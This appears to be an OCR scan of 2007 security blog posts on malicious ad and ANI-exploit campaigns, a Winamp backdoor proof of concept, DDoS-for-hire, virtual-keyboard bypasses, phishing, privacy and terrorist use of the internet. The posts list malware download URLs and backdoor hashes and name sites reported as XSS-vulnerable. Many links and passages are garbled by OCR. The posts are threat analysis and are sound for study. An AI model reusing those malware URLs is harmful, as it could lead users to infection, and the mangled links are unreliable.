pagead2.googlesyndication.com.mmhk.cn 

What's the most cost-effective approach, yet the most 
effective one as well when it comes to that sort of 

scheme? On a quarterly basis, a "for-the-masses" zero day 
vulnerability becomes reality. The fastest exploitation of the 
"window of opportunity" until a patch is released and 
applied, is abused by embedding the exploit into high traffic 
web sites, or even more interesting, exploiting a vulnerability 
in a major Web 2.0 portal to further spread the first zero day. 
Therefore, access to top web properties is a neccessity, and 
much more cost effective compared to 

using AdSense. I wouldn't get surprised to find out that 
hiring a SEO expert to reposition the malicious sites is also 
happening at the time of blogging. Some details at 
[8]McAfee's blog. 

Despite the amateurs using purchased keywords as an 
infection vector, at another malicious url _ s.gcuj.com 

we have a decent example of a timely exploitaition with _ 
s.gcuj.com /t.js and _ s.gcuj.com /l.htm using Microsoft's 

ANI cursor vulnerability to install online games related 
trojans - _ t.gcuj.com /O.exe _ The series of malicious URLs 
are 222 

mostly advertised or directly injected into Chinese web 
forums, guestbooks etc. Here are some that are still active, 



the majority of AVs thankfully detect them already : 

_ cool.47555.com /xxxx.exe _ 

_ d.77276.com /O.exe _ 

_ www.pumal63.com /pu/pu.exe _ 

_ rzguanhai.com /server.exe _ 

The key point when it comes to such attackers shouldn't be 
the focus on current, but rather on emerging 

trends, and they have to do with anything, but malicious 
parties continuing to use AdSense to direct traffic to their 

sites in the long term. Watch a video related to the attacks, 
courtesy of Exploit Prevention Labs. 

[EMBED] 

1. http://ddanchev.blo as pot.com/2007/Q3/spam-comments- 
attack-on-techcrunch.html 

2. http://ddanchev.blo as pot.com/20Q6/ll/blo aos phere-and- 
s plo a s.html 

3. http://ddanchev.blo as pot.com/20Q6/10/automated-seo- 
s pam- a eneration.html 

4. http://ddanchev.blo as pot.com/20Q7/01/attack-of-seo-bots- 
on-edu-domam.html 

5. http://www.forbes.com/securitv/2007/Q4/26/ a oo a le-crime- 
malware-tech-securitv-cx a a _0426 a oo a le.html 

6 . 

http://news.com.com/Goo a I e+ pul ls+malicious+sponsored + li 




























nks/2100-7349 3-618QQ22.html 


7. http://techdirt.com/articles/20070427/0300Q4.shtml 

8. http://www.avertlabs.com/research/blo a /=3fp = 3d264 
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Video Demonstration of Vbootkit (2007-04-30 21:07) 

Orignally introduced at this year's Blackhat con in 
Amsterdam, the Vbootkit is a kit showcasing the [l]execution 
of unsigned code on Windows Vista. Recently, the 
[2]researchers released two videos [3]demonstrating the 
attack worth 

watching. Here's the [4]authors' research itself. Answering 
the mythical question on which is the most secure OS, 

direct the reply in a "which is the most securely configured 
one" manner, and you'll break through the technology 
solution myopia and hopefully enter the security risk 
management stage. A secure OS from what? Nothing's 
unhackable, the [5]unhackable just takes a little while - 
where the [6]invisible [7]incentivising in the [8]desired 
direction is the shortcut. 

1. http://ddanchev.blo as pot.com/20Q7/Q3/unsi a ned-code- 
execution- i n-windows.html 

2 . 

http://www.nvlabs.in/files/nitin vioin vista vbootkif ooc RC1 
edited video.avi 


3. 

http://www.nvlabs.in/files/nitin vioin vista vbootkit ooc RC2 


















video.avi 


4. 

http://www.nvlabs.in/files/vbootkit nitin vipin white paper.pd 
f 

5. http://www.pcworld.com/article/id . 131145- 
pg. l/article.html 

6. http://ddanchev.blo as pQt.com/2005/12/0bav-how-realistic- 
is-market-for.html 

7. http://ddanchev.blo as pot.com/2006/05/shaoin a -market- 
for-securitv.html 

8. http://ddanchev.blo as pot.com/2006/Q5/dela vina- 
vesterdavs-Odav-securitv.html 
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Cryptome Under Fire (2007-04-30 21:26) 

John Young at [lJCryptome.org is reporting that its [2]hosting 
provider decided to terminate their relationship on the basis 
of violating their Acceptable Use Policy : 

11 This notice of termination is surprising for Verio has been 
consistently supportive of freedom of information 

against those who wish to suppress it. Since 1999 Cryptome 
has received a number of e-mailed notices from Verio's 

legal department in response to complaints from a variety of 
parties, ranging from British intelligence to alleged 

























copyright holders to persons angry that their vices have 
been exposed (see below). In every case Verio has heretofore 

accepted Cryptome's explanation for publishing material, 
and in some cases removal of the material, and service has 

continued. In this latest instance there was no notice 
received from Verio describing the violation of acceptable 
use 

to justify termination of service prior to receipt of the 
certified letter, thus no opportunity to understand or respond 
to the basis for termination. 


Guess who'll be the first echo-cursing in an unnamed 
CavePlex? That'll be Osama Bin Laden feeling sorry for 

not making copies of key documents on how the U.S Coast 
Guard is vulnerable to [3]TEMPEST attacks. Cutting out 

the sarcasm, Cryptome is an [4]OSINT heaven, no doubt 
about it, but it's also an initiative debunking the entire 

concept that secrecy actually results in improved and 
sustained security on an international level. 

The data collected at Cryptome would never be destroyed, 
mainly because it's all digital, it's all distributable, 

and it simply wants to be free. Thought of the day - The man 
who brought fire to the world got burned at the stake . 
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1. http://cr v ptome.or g /cr v ptome-shut.htm 





2. http://vro.slashdot.or g /article.pl7sid = 07/04/29/134232 

3. http://en.wikipedia.or g /wiki/TEMPEST 


4. http://ddanchev.blo gs pot.com/2006/Q9/benefits-of-open- 
source-intelli o ence.html 
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The Brandjacking Index (2007-05-02 02:35) 

Picture a situation where a customer gets tricked into 
authenticating at the wrong site of company XXX. Would 
they 

do business with company XXX after they get scammed, 
trojan-ized, and spammed to (virtual) death? I doubt so, and 

as we can also see in the results of a recently released survey 
on [l]whether or not customers would do business 

with retailers who exposed personal data - they'd rather 
dump them right away. 

MarkMonitor just released their first [2]quarterly 
Brandjacking Index : 

" The Brandjacking Index investigates trends, including 
drilled-down analysis of how the most popular brands 













are abused online and the industries in which abuse is 
causing the most damage. The report examines the ever- 


adaptive tactics of brandjackers such as cybersquatting, 
false association, pay-per-click (PPC) fraud, domain kiting, 

objectionable content, unauthorized sales channels and 
phishing. The Brandjacking Index tracks the top 25 brands 

from the 2006 Top 100 Interbrand study plus additional 
Interbrand ranked companies for business segment analysis. 
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The old marketing rule that a dissatisfied customer will share 
the bad experience with at least five more fully applies here, 
and given he or she's an opinion leader in their circle - 
you've got a problem as it's your brand in the domain name. 
Therefore, despite the companies [3]developing a market 
segment for timely and reliably [4]shutting 

down phishing sites, the most obvious "cybersquatted" 
domains shouldn't even be allowed to get registered at the 
first place. But given the flexibility of registering a domain 
these days, from a company's perspective, cybersquatting's 
an uncontrollable external factor, and in order to protect 
their future flow of "soft dollars" efforts to monitor the 
domain space are highly advisable. 

There're several key techniques you should keep in mind. 
Cybersquatting, vulnerabilities within the browser 

to spoof the status bar and make it look like the legitimate 
page, or a malware infected PC that's basically redirecting all 
the known E-banking sites to fake ones. [5]No anti virus, no 
Ebanking is highly advisable, yet not a solution to 



the problem, and E-banking site's compatibility with the 
most popular - and targeted - Internet Explorer browser 

ONLY, turn many precautions into a futile attempt to deal 
with the problem - [6]heading in the opposite direction. 

The question is, which technique is more effective at the end 
user's perspective, and how should the targeted orga¬ 
nizations deal with this indirect form of attack on their 
brands, reputation and the rest of the "soft dollars" goodies 
such as favorable PR and stakeholder's comfortability? From 
another perspective, who's more irresponsible, the 

unaware end user, or banks whose [7]web application 
security ignorance make it easier for phishers to establish 
trust? 

One solution to the problem is shortening the lifetime of such 
a domain to the minimum by tracking and shut¬ 
ting them down by using a commercial service like this 
[8]online trademark monitor, a screenshot of which you can 

see at the top of the post. Perhaps rather resources- 
consuming, but [9]educating your customers for their own 

safety in times when anyone can register a pay-pal-login.tld 
domain like through third-party registers, [10]is another way 
[ll]to go. Did I mention that [12]anti-phishing toolbars are a 
free alternative in case common sense fails - like it does? 

1. http://www.securitvfocus.com/brief/481 

2. http://www.markmonitor.com/news/press-07Q430.html 

3. http://ddanchev.blo as pot.com/2007/Q3/take-this- 
malicious-site-down.html 









4. http://ddanchev.blo as Dot.com/2007/Q4/takin a -down- 
ohishin a -sites-business.html 

5. http://ddanchev.blo as pot.com/2006/Q5/no-anti-virus- 
software-no-e-bankin a .html 

6. http://ddanchev.blo as pot.com/2006/Q4/headin a -in- 
op posite-direction.html 

7. http://ddanchev.blo as pQt.com/2007/02/xss-vulnerabilities- 
in-e-bankin a -sites.html 

8 . 

http://www.hollanderco.com/online trademark monitor.htm 

9. http://ddanchev.blo as pot.com/2006/Q9/interestin a -anti- 
phishin a- oro i ects.html 

10. http://www.mailfrontier.com/forms/msft_ia test.html 

11. http://www.sonicwall.com/ohishin a/ 

12. http://ddanchev.blo as pot.com/2006/Q3/anti-phishin a- 
toolbars-can-vou-trust.html 
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Anti-Censorship Lifestyle (2007-05-02 22:06) 

[ 1 ] 

Following a previous post on [2]security lifestyle(s), and in 
between the ongoing efforts to [3]censor a 16 digit 

number I feel it's about time you [4]dress yourself properly in 
case you haven't [5]done so already. Censorship in a 


































Web 2.0 world is futile, the way [6]security through obscurity 
is. Seems as [7]everyone's talking about the number 

today, there's even a [8]domain name registered with it. 

1 . 

http://ima a es.cafepress.com/product/129059439v3 240x240 
FrontColor-Black. i Q.g 

2. http://ddanchev.blo as pot.com/20Q7/01/securit v- 
lifestvles.html 

3. 

http://di aa .com/tech news/Di aa This 09 f9 11 02 9d 74 e 
3 5b d8 41 56 c5 63 56 88 cO 4 

4. http://www.cafepress.com/09f911029d74e35 

5. http://www. i inx.com/ 

6. http://en.wikipedia.or g /wiki/Securitv throu g h obscurit y 

7. http://www.f1ickr.com/photos/xeni/481544025/ 

8. htt p://09-f9-ll-02-9d-74-e3-5b-d8-41-56-c5-63.com/ 
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05.03.2007 
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no virus fount 
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Winamp PoC Backdoor and a Zero Day (2007-05-04 
04:53) 

Listen to your infection? Not necessarily as this backdoor 
binds cmd.exe on port 24501, but needs to be [ 1 ]socially 

engineered in the form of a plugin for Winamp. Code 
originally released in December, 2006, see attached 
screenshot. 

Not much of a fun [2]here either, but as the folks at [3]SANS 
point out Winamp doesn't play .MP4 files automatically 

from a web page, so no chance to have it embedded within 
popular sites and cause mass outbreaks as we saw it 

happen with the with [4]ANI exploit [5]code and the [6]WMF 
one. 


gen _wbkdr.dll 








File size : 45056 bytes 

MD5 : 74dl49f4alf210ea41956af6ecedb96b 

SHA1 : 5a2e8d5727250a647ce44d00cf7446775e6cd7d5 

1. http://ddanchev.blo as DOt.com/20Q7/01/social-en a ineerin a- 
and-malware.html 

2. http://milw0rm.com/exoloits/3823 

3. http://isc.sans.or g /diarv.html7storvid = 2 729 

4. http://www.websense.com/securitvlabs/blo a /blo a.ohp? 
Blo a lD=119 

5. http://www.websense.com/securitvlabs/blo a /blo a.ohp? 
Blo a lD=120 

6 . 

http://www.infoworld.com/article/06/01/30/74902_HNhackers 

amd l.html 
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A Chronology of a Bomb Plot (2007-05-04 05:17) 


A very [l]detailed overview of a bomb plot, especially the 
lines related to anything digital such as : 


An e-mail sent from Mr. Khawaja to Mr. Khyam on Nov. 30, 
2003, read: "It's not as easy as we thought it would be. 

We have to design the whole thing ourselves. "There are two 
parts to it, one transmitter and another receiver that will be 
at a distance of about 1 or 2km that will be attached to the 
wires and send out 5 volts down the line and then we get 
fireworks. " 

No details on [2]whether or not the communication was 
encrypted, how it was decrypted - indirectly through 


















client side attacks for sure - and was their communication on 
purposely intercepted or filtered though the noise with 

keywords such as transmitter, wires and fireworks. 

- 11 Mr. Mahmood was working for the British gas company, 
Transco, and had stolen sensitive CD-ROMs from 

National Grid , a British utility, that detailed the layout of 
hundreds of kilometres of high-pressure gas pipelines in 
southeast England. " 

And [3]the insider threat was just an overhyped threat with 
lack of statistical evidence of it happenning. Think twice. 

Don't dedicate efforts in ensuring such information never 
makes it out of the organization due to terrorist fears only, 
but consider the consequences of it getting into the wrong 
hands at the first place. 


A notebook in the living room included references for books 
including The Virtue of Jihad, and Declaration of War. 11 

Propaganda writings are easily obtainable online, which 
reminds me that monitoring them to the very last mile is 
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worth the risk in order to further expand their network, of 
both, [4]sites they visit and people they communicate with. 


Downloaded on to his laptop was a computer file, [5]The 
Mujahideen Explosive Handbook. It contained the exact 



recipe to build an ammonium nitrate bomb. 11 

On purposely placed online DIY manuals can act as 
honeypots themselves. As we've already seen, counter¬ 
terrorism forces across the world are establishing such 
[6]fake cyber jihad communities in order to lure and monitor 

wannabe jihadists. But monitoring who's obtaining the 
already hosted in the wild manuals, is far more beneficial 

than hoping someone will eventually fall a victim into your 
cyber trap. 

In another related research by the RAND Corporation entitled 
M [7]Exploring Terrorist Targeting Preferences" 

the authors try to come up with various scenarios on the 
process of prioritizing possible targets such as : 


the coercion hypothesis ; the damage hypothesis ; the rally 
hypothesis ; and the franchise hypothesis . If Al-Qaeda 

directs the next attack the coercion and damage hypothesis, 
and, quite possibly both, are the most likely to influence the 
nature of the target. 

Great psychological imagination applied in the paper, worth 
the read. From a statistical point of view, the probability of 
death due to a car accident is higher than that of a terrorist 
attack, so consider escaping the FUD related to 

terrorism that's streaming from your favorite TV channels in 
order to remain objective. The ugliest part of them all is that 
everyone's discussing the post-event actions taken, and no 
one is paying any attenting to the pre-event activities that 



made it possible, and with training camps under heavy fire, 
[8]the digitalization of terrorist training is taking place. 

And here's another great analysis, this time covering the 
process of [9]how terrorists send money by combin¬ 
ing anonymous Internet services in between mobile banking 


11 Advanced mobile technology, cooperation between 
international mobile communications providers and in¬ 
ternational financial institutions and the lack of regulations 
make for a swift, cheap, mostly untraceable money 

transfer - known as M m-payments" - anywhere, anytime, by 
anyone with a mobile telephone. 


Dare we say adaptive? 

1. http://www.canada.com/ottawacitizen/news/storv.html? 
id = 84af78eb-e854-4abf-b6b6-683c4f6a799e 

2. http://ddanchev.blo as pot.com/20Q7/Q4/mu i ahideen- 
secrets-encr v ption-tool .html 

3. http://ddanchev.blo as pot.com/2QQ5/12/insiders-insi a hts- 
trends-and-possible.html 

4. http://ddanchev.blo as pot.com/20Q7/Q2/forensic- 
examination-of-terrorists-hard.html 


5. http://www.washin a tonpost.com/w p- 
d vn/content/ ara phic/2005/08/05/GR2005080501177.html 























6. http://ddanchev.blo as DOt.com/2007/Q3/cvber-traps-for- 
wannabe- i ihadists.html 

7. http://www.rand.or a/ pubs/mono ara phs/MG483 

8. http://ddanchev.blo as pot.com/2007/Q4/conventional- 
weaponrv-vs-cvber.html 

9. 

http://www.spacewar.com/reports/How_Terrorists_Send_Mone 
v 999.html 
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DDoS on Demand VS DDoS Extortion (2007-05-08 
15:40) 

There were [l]recent speculations on the decline of DDoS 
attacks, in respect to the lack of companies actually 

paying to extortion attacks and that it's supposedly not a 
cost effective approach for malicious attackers to use 

their botnets. Think again, as it's always a matter of a 
vendor's sensor network diversity, one that's also excluding 

targeting mom-and-pop web properties. Just because DDoS 
extortion may not be working, and I say may not be 

working because only a few companies would admit they 
have paid money given the simple math of losing revenues 






















on an hourly basis and spending more on bandwidth and 
security consultancy than the money requested, DDoS on 

demand still remains a well developed underground business 
model. DDoS attacks may not be profitable for the 

attacker directly performing them, but remain profitable if 
he's getting paid to provide the service only . Here's an 

excerpt from my [2]Future Trends of Malware (January, 2006) 
publication related to DDoS extortion : 

11 Now you should ask yourself, would total cost of ownership 
of the business, the costs of the bandwidth, the 

DDoS attack protection solution, or the botmaster's deal with 
the devil style proposition can solve the situation. If 

you're thinking big, each and every time an organization 
pays, it not only risks a repeated demand, but is also fueling 
the growth of the practice in itself - so don't do it! 11 

I'm aware of an ironic situation where a small-biz client's web 
server started getting DDoS without any reason 

whatsoever. The first thing that came to my mind was that 
it's either a DDoS extortion, or a possible rival, so I asked 
whether or not they've received any extortion emails. They 
declined, and here comes the interesting part, two 

days later, the attacks stopped, and a letter arrived in the 
form of the following email - "We saw you ignored our first 
email so we had to demonstrate you the power of our attack, 
this is your second chance to bla bla bla". What happened, 
and why did they say no extortion emails were sent? Here 
comes the irony, in the spam folder of the 



publicly obtainable email account for the domain was the 
original extortion email, that got detected as a spam. Time 

for some [3]cyber intelligence to assess their capacity.. Never 
comply with such letters, or they'll come back for more. 

By the way, ever thought of the DDoS extortion bluff? 

Here's another excerpt on DDoS on demand : 


There's a lot of demand for paying to teens to shut down your 
competitors and hoping they would go under the radar, 

and while ethics are excluded, given these get busted, they'll 
be the first to forward the responsibility to the buyer of the 
service. There's also a clear indication of market for such 
services, and sooner or later these individuals will improve 
their communication skills, thereby increasing the impact of 
these attacks. For instance, Jay Echouafni, CEO 

of TV retailer Orbit Communications, paid a group of 
botmasters to DDoS his competitors, where the outage costs 

were estimated at $2 million. Another case of DDoS on 
demand occurred in March, 2005, when the FBI arrested a 

17 year old and a Michigan man for orchestrating a DdoS 
attack, again causing direct monetary loses. DDoS attacks, 

and the ease of gaining capability in this field are clearly 
increasing. 11 


Unethical competitions would favor a service where a third 
party maintains the infrastructure, launches the 



attack, and for the safety of both parties, remain as 
anonymous as possible. Here' [4]a related article at BBC 
News: 

11 We are seeing a lot of anti-competitive behaviour," he said. 
Mr Sop added that many more Asian targets 

were being hit by DDoS attacks - a region in which Symantec 
did not historically have a big presence. In Asia, he 
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said, DDoS attacks were proving very popular with 
unscrupulous firms keen to get ahead of their rivals. "The 
really frightening thing is you can buy access to a botnet for 
a small amount of money and you can have you competitor 

down for a long time," he said." 

I never actually enjoyed articles emphasizing on how Russian 
script kiddies are taking over the world given the idea 

of "outsourcing malicious services". So next time you see a 
DDoS attack coming from the Russian IP space against U.S 

companies, it could still be U.S based rivals that requested 
the attack on their U.S based competitors - stereotypes 

keep you in the twilight zone. 

Meanwhile, here's a proof [5]hacktivism is still alive and fully 
operational as the Estonian Internet infrastruc¬ 
ture's been recently under permanent DDoS attacks due to 
real-life tensions of removing a statue from the Soviet 

era. It wasn't Chinese Mao-ists that did it for sure, but the 
recent case is another proof that it's always about the 



money, as everyone not aware of different malicious 
attackers' motives is preaching. DDoS extortion isn't dead, 
it's 

just happening beneath the radar, as targets are picked up 
more appropriately balanced with less greed regarding 

this underground business model only. 

UPDATE : More developments on the [6]DDoS attacks in 
Estonia now combined with defacements, which I think was 

only a matter of time. 

Related posts: 

[7] The Underground Economy's Supply of Goods 

[8] The War against botnets and DDoS attacks 

[9] Emerging DDoS Attack Trends 

[10] Korean Zombies Behind the Root Servers Attack 
[lljHacktivism Tensions - Israel vs Palestine Cyberwars 

1. http://it.slashdot.or a /article.pl? 
sid = 07/05/01/2135212&from = rss 

2. http://www.linuxsecuritv.com/docs/malware-trends.pdf 

3. http://ddanchev.blo as pot.com/2006/09/cvber-intelli a ence- 
c vberint.html 

4. http://news.bbc.co.Uk/l/hi/technolo a v/6623673.stm 

5. http://www. ph vsor a .com/news97643458.html 

6. http://www.f-secure.eom/weblo a /#00001188 



















7. http://ddanchev.blo as pot.com/2007/03/under a round- 
economvs-su ppl v-of- a oods.html 


8. http://ddanchev.blo as pot.com/2006/Q2/war-a a ainst- 
botnets-and-ddos-attacks.html 


9. http://ddanchev.blo as pot.com/2007/Q2/emer aina -ddos- 
attack-trends.html 


10. http://ddanchev.blo as pot.com/2007/Q2/korean-zombies- 
behind-root-servers.html 


11. http://ddanchev.blo as pot.com/2006/Q7/hacktivism- 
tensions-israel-vs.html 
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Disintermediating the Major Defense Contractors 
(2007-05-10 00:35) 

[ 1 ] 

Innovative and cost-effective altogether? Think 

[2] SpaceShip0ne, a commercial 

space ship that didn't come from a major defense contractor, 
not even NASA but from a competition won by a 

privately run company. How to disintermediate yet innovate? 
Become a venture capitalist, or an angel investor and 

optimistically hope the academic-to-commercialization 
process would happen with one of your investments. The 

[3] DeVenCI project aims to [4]connect sellers with buyers 
and seems like a [5]sound short-term objectives oriented 























idea compared with [6]ln-Q-Tel the CIA's VC fund 
emphasizing on long-term R &D : 

11 Some companies have already profited from the program. In 
2003, when DeVenCI was in its experimental 

phase, the Defense Information Systems Agency was looking 
for ways to protect computer networks . After speaking 

to several companies through DeVenCI and evaluating their 
technology, the agency wound up working with ArcSight, 

a software company based in Cupertino, Calif., which won 
$3.6 million in related contracts over the next few years, 

DeVenCI officials said. Mr. Novak of Novak Biddle said he 
brought with him to the March DeVenCI meeting two execu¬ 
tives from a small start-up developing biometric technology 
that could be used for things like advanced fingerprinting or 
eye scans. Mr. Novak said the chief executive and chief 
technology officer from the Virginia company, which 

he declined to name for competitive reasons, gave a 
presentation to the roughly 50 assembled procurement 
agents. 11 

Here's [7]ln-Q-Tel's investment portfolio so far - Google used 
to be among them. 

Related posts: 

[8] Insider Competition in the Defense Industry 

[9] Aha, a Backdoor! 

[10] Overachieving Technology Companies 



1. http://photQsl.blo aa er.com/blo aa er2/4099/2257/200/in-g - 
tel-portfol io. i pa 

2. http://www.scaled.com/pro i ects/tierone/ 

3. 

http://www.dtic.mil/descriptivesum/Y2008/QSD/0603781D8Z 

.pdf 

4. 

http://nvtimes.com/2007/05/Q7/technolo a v/07venture.html? 
_r=2&adxnnl = l&aref=slo a in&ref=business&adxnnlx=1178 

661612-GmU4Cd4sMY0 Ll lmN02pW6 a&paa ewanted = print 

5. http://www.nvca.or a/ pdf/ConsultantsSelection.pdf 

6. http://en.wikipedia.or a /wiki/ln-0-Tel 

7. http://ddanchev.blo as pot.com/20Q6/10/cias-in-a-tel- 
investments-PQrtfolio.html 

8. http://ddanchev.blo as pot.com/2006/Q5/insider- 
competition-in-defense.html 

9. http://ddanchev.blo as pot.com/2006/05/aha-backdoor.html 

10. http://ddanchev.blo as pot.com/2007/Q2/overachievin a- 
technolo a v-companies.html 
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International Cryptography Regulations Map (2007- 
05-10 01:42) 

Regulations on importing, exporting and using encryption 
greatly vary across the world. Bert-Jaap Koops came up 










































with some [l]informative maps highlighting the big picture 

" This is a graphic summary of the pertaining cryptography 
laws and regulations worldwide as outlined in the 

most recent version of my Crypto Law Survey. It shows the 
import controls, export controls, and domestic controls, 

according to the information available to me. Consult the 
corresponding entry in the Crypto Law Survey for the 

contents of the pertaining regulation in a particular country. 

And here's a related post on [2]a bureaucratic utopia, 
another one on [3]bureaucracy vs reality when it comes 

to security, as well as famous cases related to [4]criminals 
using encryption. 

1. http://rechten.uvt.nl/koops/cr v ptolaw/cls-sum.htm 

2. http://ddanchev.blo as pot.com/2006/Q6/all-vour- 
confidentialitv-are-belon a -to.html 

3. http://ddanchev.blo as pot.com/2006/Q3/are-cvber- 
criminals-or-bureaucrats.html 

4. 

http://www.cs. a eor a etown.edu/%7Edennin a /cr v pto/cases.ht 

ml 
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Welcome to Citibank Online 


Use your keyboard to enter your 16 digit ATM / 
Debit Card Number or Credit Card Number or Loan 
ID or World Money Card 



► I- 

I - Save my card number and create username 


Enter your Password using the Mouse 
IP IN r (SPIN 

► I 

Internet Password is not case sensitive 



iDSiDiDdJIEloJStEID _ 

EUSfcJlUSmfflQLOlJ 
0[7)0(7)0a[D0ffl_ 

I_aJIjJ0LfJ|gJ[hJIjJ0IjJ 


Clear all 


. Online identity 
fraud/phishing 

► Special Offers 

► Security tips 


► Trouble logging in? Click herel 

► Don't have Internet Password? Click here to get one 
* Recommended settings 

Unable to login with mouse pad? Click here to login using 
keyboard 


Defeating Virtual Keyboards (2007-05-10 16:18) 

To deal with the threat of keyloggers - or to win time during 
te process of implementing two factor authentication 

and one-time-passwords-in-everything - E-banking providers 
started introducing virtual keyboards as a pragmatic 

solution to the threat. Malicious attackers are anything but 
old-fashioned and this is a great example that insecurities 
are only a matter of perspective. To the E-banking providers 
who were aware that a static virtual keyboard would be 

much more easier to defeat, a randomized characters 
appearance came into play and so attackers adapted by first 

[l]taking video sessions of the login process, and now 
turning each mouse click into a screenshot to come up with 












the accounting data in a [2]PoC on Defeating Citibank Virtual 
Keyboard: 

" Citibank Virtual Keyboard is a security enhancement for 
protecting from the key loggers. Using this virtual keyboard 
user can enter Card no and I PIN using mouse. This keyboard 
will display a keys in random position in a virtual 

keyboard on the screen where it makes little difficult for 
password capture. This only gives confidence for end user 

from key loggers not from other methods. Local attacker can 
use Win32 API's to capture using screen shot method 

and obtain sensitive information including Credit Card/Debit 
Card (Suvidha Account), I PI N and misuse it. 11 

From a malicious economies of scale perspective, these 
rather amateur techniques mean lack of efficiency 

compared to advanced tools suh as [3]the Nuclear Grabber 
which I intend to cover in-depth in a future post from the 

[4]Malicious Wild West series. 

1. http://ddanchev.blo as pot.com/2006/Q9/bankin a -tro i an- 
defeatin a -virtual.html 

2 . 

http://www.tracin a bu a .com/index. ph p/articles/view/23.html 

3. http://ddanchev.blo as pot.com/20Q6/ll/nuclear- a rabber- 
toolkit.html 

4. http://ddanchev.blo as pot.com/2007/Q4/shots-from- 
malidous-wild-west-sample 25.html 
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Big Brother Awards 2007 (2007-05-11 17:39) 

[1] 

I always liked the idea of emphasizing on the big picture 
when it comes to the 

worst privacy invadors on a worldwide basis compared to 
that of a particular country only. They are all interconnected 
to a certain extend, united under the umbrella of the 
common good which as a matter of fact won a golden boot in 

this year's [2]Big Brother International Awards : 

" Pi's 'Big Brother Awards' have been running for nearly ten 
years, with events run in eighteen countries around the 
world. Government institutions and companies have been 
named and shamed as privacy invaders in a variety of 

countries and contexts. This year was the first time that 
Privacy International ran an international event to identify 
the greatest invaders around the world. The event was 
hosted by 'the pope', as presented by Simon Davies in full 

regalia. Previous hosts include 'Dr. Evil' and 'The Queen of 
England'. 11 

Here are the winners in their categories : 

Most invasive company - Choicepoint 

Data aggregators and centralizing too much personal data in 
a single place makes it vulnerable even to [3]pringles 

hacking attacks. Next year I'm sure Google's purchase of 
Doubleclick would get more attention 


Worst Public Official - Stewart Baker 


The way Microsoft and open source look awkward in a 
sentence in this very same way democracy looks awkward 

next to Russia 

Most Heinous Government - The United Kingdom 

Fully agree here. Twisting the common good is very 
marketable 

Most Appalling Project or Technology - The International 
Civil Aviation Organization 

I think the CCTV industry should have won here the rest are 
bureaucrats whose closed doors propositions 

later on face the public outbreak of how not to implement 
them. Anyway supply meets the demand for surveillance. 

Lifetime Menace Award - The Common Good' 

The main reason for the existence of [4]today's intrusive 
surveillance technologies is the idea of the common good. 

[5]We spy on you to protect you, we take away your civil 
liberties to protect you, and [6]CCTV after CCTV you end up 

in a situation which can be best seen in the U.K 

Related posts: 

[7] The Future of Privacy = don't over-empower the watchers! 

[8] Security vs Privacy or what's left from it 



[9] The Cell-phone Industry and Privacy Advocates VS Cell 
Phone Tracking 

[10] Afterlife Data Privacy 
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1 . 

http://photosl.blQ aa er.com/blo aa er2/4099/2257/200/brainw 

ashin q.ipq 

2. http://www.privacvinternational.or a /article.shtml? 
cmd%5B347%5D=x-347-553112 

3. http://www.itnews.com.au/newsstorv.aspx? 
ClaNID=51672&src=site-mara 

4. http://ddanchev.blo as pot.com/2007/Q3/vouve- a ot- 
somethin a -in-vour-eve.html 

5. http://ddanchev.blo as pot.com/2007/01/eves-m-lQndQns- 
sk v-su rveillance-poster.html 

6. http://ddanchev.blo as pot.com/2007/03/documentarv-on- 
cctvs-in-uk.html 

7. http://ddanchev.blo as pot.com/2006/03/future-of-privac v- 
dont-over-empower.html 

8. http://ddanchev.blo as pot.com/2006/Q3/securitv-vs- 
privacv-or-whats-left-from.html 

9. http://ddanchev.blo as pot.com/2006/Q5/cell-phone- 
industrv-and-privacv.html 

10. http://ddanchev.blo as pot.com/2006/Q9/afterlife-data- 
privacv.html 
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XSS The Planet (2007-05-14 17:26) 

Yet another initiative proving that major sites indeed suffer 
from [1]XSS vulnerabilities in exactly the same fashion 

[2]E-banking sites do. Perhaps the most interesting point 
regarding the list is that it's from 2005 and some of the 

sites still remain vulnerable but why is that? Lack of internal 
incentive programs to deal with the problem? Not 

getting the necessary attention given the rise of the lost 
laptop with unencrypted data issue? A lack of common 

sense is the best alternative for me. Consider the perspective 
- its like utilizing quantum encryption for the sake 

of protecting the confidentiality of your data but remaining 
vulnerable to wardriving attacks capable of obtaining 

the data in a pre-encryption stage, even on the fly. The 
encrypted data myopia is on the rise and it's the result of a 
yet another "stolen laptop news article" emphasizing on 
current and ignoring the emerging trends, namely, that a 
mobile workforce's improved productivity is proportional with 
the insecurities coming from storing sensitive data 

in a less controlled external environment. There's no point in 
implementing state-of-the-art technology when you 

haven't taken care of the basics, such as the ones that are so 
easy to exploit even a script kiddie can become the next 
pentagon hacker bruteforcing passwords on an unclassified 
system. And yes - [3]trivial XSS ones too. 


Currently active URLs on the list are the following : 

Nortel.com 

Federal Deposit Insurance Corporation 

JC Penney 

SonyStyle.com 

D-Link.com 

Poetry.com 

1. http://pointblanksecuritv.com/xss/xss2. phD 

2. http://ddanchev.blo as pot.com/2007/Q2/xss-vulnerabilities- 
in-e-bankin a -sites.html 

3. http://pointblanksecuritv.com/xss/xss2. php 
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RSnake*s XSS Cheat Sheet - 

Iftame Technique -* f 
IMG Technique 
External JavaScnpt Technique 

XML Port Scanning -• 

icss -♦ 


:<SS Evasion Tactics 


y JavaScnpt Port Scanning | 


I Evil Markelting -* 

JS Login Detection *♦ • Stealing the Browser History 

Authenticated Images -♦ 

Authenticated Re directs -♦ 

DOM-based XSS -• 


-• Backdoortng Quicklime • 
-♦ Backdoonng PDF Files 

Backdoonng - -• Backdoonng Flash 

/ \ / ■ ■ 

Backdoonng Images 

_ -* Backdoonng MSWord 

' W®* 1 2*0 Hackirm \ -♦ Cross Site Request F oigeiy 

-♦ DNS Pinning 

*• Harking RSS Feeds 


' Hacking Social Netwoiks 


• «♦ Backdooring MP3$ (QTL ) I 
- Universal PDF XSS 


HTTP flVGCHAELDAW ORO 


Mind Mapping Web 2.0 Threats (2007-05-14 21:30) 




























An informative, and for sure to be expanded mind map 
presenting various Web 2.0 threats courtesy of [l]Mike Daw 

who by the way neatly integrated the anti virus detection 
results to his [2]web backdoors compilation, I commented 

on in a [3]previous post. Here are [4]two more mind maps of 
Firefox security related tools, and the threats faced 

by mobile devices. A related post on [5]the "wormability" of 
web application insecurities for everyone thinking flash 
worms. 

1. http://michaeldaw.or g/ 

2. http://michaeldaw.or g/ pro i ects/web-backdoor-compilation/ 

3. http://ddanchev.blo QS POt.com/2007/04/compilation-of- 
web-backdoors.html 

4. http://ddanchev.blo QS POt.com/2007/03/complexitv-and- 
threats-mind-ma p pin g .html 

5. http://ddanchev.blo QS POt.com/2006/05/current-state-of- 
